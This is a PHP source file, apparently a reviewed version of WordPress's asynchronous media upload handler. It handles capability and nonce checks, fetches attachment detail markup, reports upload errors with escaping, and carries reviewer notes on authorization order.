<?php
/**
 * Server-side file upload handler from wp-plupload or other asynchronous upload methods.
 *
 * @package WordPress
 * @subpackage Administration
 */

// Mark the request as AJAX when it is the Plupload `upload-attachment` action.
// This runs before WordPress is loaded, so only the raw request value is available.
if ( 'upload-attachment' === ( $_REQUEST['action'] ?? null ) ) {
	define( 'DOING_AJAX', true );
}

// Declare an admin context unless the including script already did.
defined( 'WP_ADMIN' ) || define( 'WP_ADMIN', true );

// Load WordPress: use ABSPATH when it is already defined, otherwise resolve
// wp-load.php relative to the parent of this directory.
require_once defined( 'ABSPATH' )
	? ABSPATH . 'wp-load.php'
	: dirname( __DIR__ ) . '/wp-load.php';

// NOTE(review): admin.php is presumably where the logged-in session is enforced
// for this endpoint; nothing in this file authenticates the caller by itself.
// Confirm before moving or removing this include.
require_once ABSPATH . 'wp-admin/admin.php';

// Responses are declared as plain text in the site's configured charset.
header( sprintf( 'Content-Type: text/plain; charset=%s', get_option( 'blog_charset' ) ) );

// AJAX upload path: delegate the whole request to the AJAX handler and stop.
// NOTE(review): this dispatch runs before the `upload_files` check below, so the
// capability and nonce checks for this path must live inside
// wp_ajax_upload_attachment() (defined in ajax-actions.php, not visible here).
// Confirm before changing that handler.
if ( 'upload-attachment' === ( $_REQUEST['action'] ?? null ) ) {
	require ABSPATH . 'wp-admin/includes/ajax-actions.php';

	// Response hardening headers are emitted before the handler writes any output.
	send_nosniff_header();
	nocache_headers();

	wp_ajax_upload_attachment();
	// Fallback response body if the handler returned instead of terminating.
	exit( '0' );
}

// Everything below requires the site-wide upload capability.
current_user_can( 'upload_files' ) || wp_die( __( 'Sorry, you are not allowed to upload files.' ) );

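// Just fetch the detail form for that attachment.
//
// NOTE(review): this branch runs before check_admin_referer(), so it is reachable
// without a nonce. It must stay read-only. The only authorization applied in this
// file before it is the site-wide `upload_files` capability; nothing here checks
// whether the caller may view this particular attachment. Confirm that is intended.
if ( isset( $_REQUEST['attachment_id'] ) && (int) $_REQUEST['attachment_id'] && ! empty( $_REQUEST['fetch'] ) ) {
	$id   = (int) $_REQUEST['attachment_id'];
	$post = get_post( $id );
	// Reject unknown IDs as well as non-attachments; without the null guard an
	// unknown ID would read a property on null.
	if ( ! $post || 'attachment' !== $post->post_type ) {
		wp_die( __( 'Invalid post type.' ) );
	}

	// `fetch` selects which markup variant is returned; it is compared loosely, so
	// the request strings '3' and '2' match the integer cases.
	switch ( $_REQUEST['fetch'] ) {
		case 3:
			?>
			<div class="media-item-wrapper">
				<div class="attachment-details">
					<?php
					$thumb_url = wp_get_attachment_image_src( $id, 'thumbnail', true );
					if ( $thumb_url ) {
						echo '<img class="pinkynail" src="' . esc_url( $thumb_url[0] ) . '" alt="" />';
					}

					// Title shouldn't ever be empty, but use filename just in case.
					$file     = get_attached_file( $post->ID );
					$file_url = wp_get_attachment_url( $post->ID );
					$title    = $post->post_title ? $post->post_title : wp_basename( $file );
					?>
					<div class="filename new">
						<span class="media-list-title"><strong><?php echo esc_html( wp_html_excerpt( $title, 60, '&hellip;' ) ); ?></strong></span>
						<?php // The stored file name is data, not markup: escape it for the HTML text context. ?>
						<span class="media-list-subtitle"><?php echo esc_html( wp_basename( $file ) ); ?></span>
					</div>
				</div>
				<div class="attachment-tools">
					<span class="media-item-copy-container copy-to-clipboard-container edit-attachment">
						<?php // The URL is written into an attribute, so it is escaped before output. ?>
						<button type="button" class="button button-small copy-attachment-url" data-clipboard-text="<?php echo esc_url( $file_url ); ?>"><?php _e( 'Copy URL to clipboard' ); ?></button>
						<span class="success hidden" aria-hidden="true"><?php _e( 'Copied!' ); ?></span>
					</span>
					<?php
					// Only users who may edit this attachment get the edit link.
					if ( current_user_can( 'edit_post', $id ) ) {
						echo '<a class="edit-attachment" href="' . esc_url( get_edit_post_link( $id ) ) . '">' . _x( 'Edit', 'media item' ) . '</a>';
					} else {
						echo '<span class="edit-attachment">' . _x( 'Success', 'media item' ) . '</span>';
					}
					?>
				</div>
			</div>
			<?php
			break;
		case 2:
			add_filter( 'attachment_fields_to_edit', 'media_single_attachment_fields_to_edit', 10, 2 );
			echo get_media_item(
				$id,
				array(
					'send'   => false,
					'delete' => true,
				)
			);
			break;
		default:
			add_filter( 'attachment_fields_to_edit', 'media_post_single_attachment_fields_to_edit', 10, 2 );
			echo get_media_item( $id );
			break;
	}
	exit;
}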

// The upload itself changes state, so it requires the `media-form` nonce.
check_admin_referer( 'media-form' );

// Resolve the parent post to attach to. A requested ID is kept only if the post
// exists and the current user may edit it; otherwise it falls back to 0.
$post_id = isset( $_REQUEST['post_id'] ) ? absint( $_REQUEST['post_id'] ) : 0;
if ( isset( $_REQUEST['post_id'] ) && ! ( get_post( $post_id ) && current_user_can( 'edit_post', $post_id ) ) ) {
	$post_id = 0;
}

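// Hand the `async-upload` file field to the media library, attached to $post_id.
$id = media_handle_upload( 'async-upload', $post_id );
if ( is_wp_error( $id ) ) {
	// Report the failure as an HTML fragment. Both request-derived values (the
	// client-supplied file name and the error message) are HTML-escaped.
	printf(
		'<div class="error-div error">%s <strong>%s</strong><br />%s</div>',
		sprintf(
			'<button type="button" class="dismiss button-link" onclick="jQuery(this).parents(\'div.media-item\').slideUp(200, function(){jQuery(this).remove();});">%s</button>',
			__( 'Dismiss' )
		),
		sprintf(
			/* translators: %s: Name of the file that failed to upload. */
			__( '&#8220;%s&#8221; has failed to upload.' ),
			// The file part may be missing or malformed when the upload fails,
			// so the name is read defensively and an empty name is used instead.
			esc_html(
				isset( $_FILES['async-upload']['name'] ) && is_string( $_FILES['async-upload']['name'] )
					? $_FILES['async-upload']['name']
					: ''
			)
		),
		esc_html( $id->get_error_message() )
	);
	exit;
}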

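// `short` and `type` are optional request parameters, so they are read
// defensively instead of being indexed directly.
if ( ! empty( $_REQUEST['short'] ) ) {
	// Short form response - attachment ID only.
	echo $id;
} else {
	// Long form response - big chunk of HTML.
	// NOTE(review): `type` comes straight from the request and becomes part of the
	// hook name below. Callbacks on `async_upload_*` must not assume it is one of
	// the documented values. A missing or non-string `type` yields the bare
	// `async_upload_` hook.
	$type = isset( $_REQUEST['type'] ) && is_string( $_REQUEST['type'] ) ? $_REQUEST['type'] : '';

	/**
	 * Filters the returned ID of an uploaded attachment.
	 *
	 * The dynamic portion of the hook name, `$type`, refers to the attachment type.
	 *
	 * Possible hook names include:
	 *
	 *  - `async_upload_audio`
	 *  - `async_upload_file`
	 *  - `async_upload_image`
	 *  - `async_upload_video`
	 *
	 * @since 2.5.0
	 *
	 * @param int $id Uploaded attachment ID.
	 */
	// The filtered value is echoed unescaped; callbacks are responsible for
	// escaping any markup they return.
	echo apply_filters( "async_upload_{$type}", $id );
}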
